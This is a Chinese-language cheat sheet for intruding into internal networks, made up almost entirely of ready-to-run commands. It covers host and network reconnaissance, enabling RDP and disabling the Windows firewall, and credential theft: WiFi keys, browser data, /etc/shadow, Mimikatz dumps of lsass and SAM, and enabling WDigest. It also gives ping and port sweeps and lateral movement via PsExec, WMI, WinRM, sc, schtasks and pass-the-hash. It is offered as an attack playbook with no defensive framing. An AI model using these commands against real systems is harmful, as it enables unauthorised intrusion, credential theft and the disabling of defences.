内网入侵

主机信息

基本信息

• Linux

#系统版本
uname -a
#开机时间
who -r
#进程列表
ps -aux
#历史命令
cat ~/.*sh_history
#本地服务
systemctl --type=service
#判断Docker
ls -la /.dockerenv
cat /proc/1/cgroup | grep docker

• Windows

#系统版本
systeminfo
#进程列表
tasklist
#全部盘符
fsutil fsinfo drives
#开机时间
net statistics workstation
#应用软件
wmic product get name,version
#本地服务
wmic service get name,pathname,startmode
#启动程序
wmic startup get caption,command,location
#PowerShell历史
type %APPDATA%\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt

用户信息

• Linux

#在线用户
w || who
#用户列表
cat /etc/passwd | grep /bin/bash
#管理员组
cat /etc/passwd | awk -F: "\$3==0"

• Windows

#用户列表
net user
#在线用户
query user
#用户权限
whoami /all
#管理员组
net localgroup Administrators

网络信息

• Linux

#ARP缓存
arp -a
#网络配置
ifconfig
#路由信息
route -n
#端口连接
netstat -pantu
#Hosts文件
cat /etc/hosts
#代理配置
env | grep -i proxy

• Windows

#ARP缓存
arp -a
#共享列表
net share
#路由信息
route print
#端口连接
netstat -nao
#网络配置
ipconfig /all
#DNS缓存
ipconfig /displaydns
#Hosts文件
type C:\Windows\System32\drivers\etc\hosts
#代理配置
reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v Proxy*

远程管理

• Linux

#SSH端口
grep -Ei "Port [0-9]+" /etc/ssh/sshd_config
#SSH日志
last | grep -Eo "([0-9]{1,3}\.){3}[0-9]{1,3}" | sort -u
#SSH历史
find / -name known_hosts | xargs grep -Eho "([0-9]{1,3}\.){3}[0-9]{1,3}" | sort -u

• Windows

#RDP启用
wmic RDTOGGLE where ServerName="%COMPUTERNAME%" call SetAllowTSConnections 1
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
#RDP端口
reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber
#RDP历史
Get-ChildItem 'Registry::HKEY_USERS\*\Software\Microsoft\Terminal Server Client\Servers\*' 2> $null
#RDP日志
Get-EventLog Security -InstanceId 4624 | ?{$_.Message -match '\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}'} | %{$Matches.Values} | Sort -Unique

防  火  墙

• Windows

#查看状态
netsh advfirewall show allprofiles
#关闭服务
netsh firewall set opmode mode=disable
netsh advfirewall set allprofiles state off
#端口放行
netsh firewall add portopening name="RDP" mode=enable protocol=TCP port=3389
netsh advfirewall firewall add rule name="RDP" dir=in action=allow protocol=TCP localport=3389
#程序放行
netsh firewall add allowedprogram name="File" mode=enable program="C:\File.exe"
netsh advfirewall firewall add rule name="File" dir=in action=allow program="C:\File.exe"

域内信息

凭证收集

WiFi密码

• Linux

cd /etc/NetworkManager/system-connections && grep -rH "psk=" | sed "s/psk=//"

• Windows

netsh wlan show profile name="WIFI名称" key=clear

Web数据

• HackBrowserData

hack-browser-data -b all -f csv --cc --dir Temp

Hash凭证

• Linux

cat /etc/shadow | awk -F: "length(\$2)>3"

• Windows

#Mimikatz
mimikatz "privilege::debug" "sekurlsa::logonpasswords" "exit"
#Reg+Mimikatz
reg save HKLM\SAM SAM.hive
reg save HKLM\SYSTEM SYSTEM.hive
mimikatz "lsadump::sam /sam:SAM.hive /system:SYSTEM.hive" "exit"
#ProcDump+Mimikatz
ProcDump.exe -accepteula -ma lsass.exe lsass.dmp
mimikatz "sekurlsa::minidump lsass.dmp" "sekurlsa::logonpasswords full" "exit"
#开启Wdigest Auth
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f

网络探测

Ping存活

• Linux

echo 192.168.0.{1..254} | xargs -n1 -P 10 ping -w 1 -c 1 | grep -i TTL | grep -Eo "([0-9]{1,3}\.){3}[0-9]{1,3}"

• Windows

for /L %I in (1, 1, 254) do @ping -w 1 -n 1 192.168.0.%I | findstr /I "TTL"

端口扫描

• Linux

for IP in 192.168.0.{1..254}; do echo -n "22,80,443,3389" | xargs -P 10 -d "," -i timeout 1 bash -c "echo >/dev/tcp/$IP/{} && echo '$IP:{} open'" 2>/dev/null; done

• Windows

ForEach($IP in (1..254|%{'192.168.1.'+$_})){ForEach($Port in 22,80,443,3389){$TCP=New-Object Net.Sockets.TcpClient;if($TCP.BeginConnect($IP,$Port,$NULL,$NULL).AsyncWaitHandle.WaitOne(300,$False)){$IP+':'+$Port+' open'}$TCP.Close()}}

横向移动

IPC$管道

• IPC

net use \\192.168.0.1\IPC$ Password /user:Domain\User
net use \\192.168.0.1\IPC$ /del

• Sc

sc \\192.168.0.1 create 服务名称 binPath= "执行命令"
sc \\192.168.0.1 start  服务名称
sc \\192.168.0.1 delete 服务名称

• WMI

wmic /node:192.168.0.1 /user:User /password:Password process call create "执行命令"

• PsExec

psexec -accepteula \\192.168.0.1 -u User -p Password -s "执行命令"

• WinRM

winrs -r:http://192.168.0.1:5985 -u:User -p:Password "执行命令"

• Schtasks

schtasks /create /s 192.168.0.1 /u User /p Password /tn 任务名称 /ru SYSTEM /sc onCE /st 12:00 /tr "执行命令"
schtasks /run /s 192.168.0.1 /u User /p Password /tn 任务名称 /i
schtasks /delete /s 192.168.0.1 /u User /p Password /tn 任务名称 /f

哈希传递

• Mimikatz

#PTK
mimikatz "privilege::debug" "sekurlsa::ekeys" "exit"
mimikatz "privilege::debug" "sekurlsa::pth /user:Administrator /domain:WORKGROUP /aes256:32ed87bdb5fdc5e9cba88547376818d4" "exit"
#PTH
mimikatz "privilege::debug" "sekurlsa::pth /user:Administrator /domain:WORKGROUP /ntlm:32ed87bdb5fdc5e9cba88547376818d4" "exit"
#RDP
reg add HKLM\System\CurrentControlSet\Control\Lsa /v DisableRestrictedAdmin /t REG_DWORD /d 0 /f
mimikatz "privilege::debug" "sekurlsa::pth /user:Administrator /domain:WORKGROUP /ntlm:32ed87bdb5fdc5e9cba88547376818d4 \"/run:mstsc.exe /restrictedadmin\"" "exit"

票据传递

NTLM中继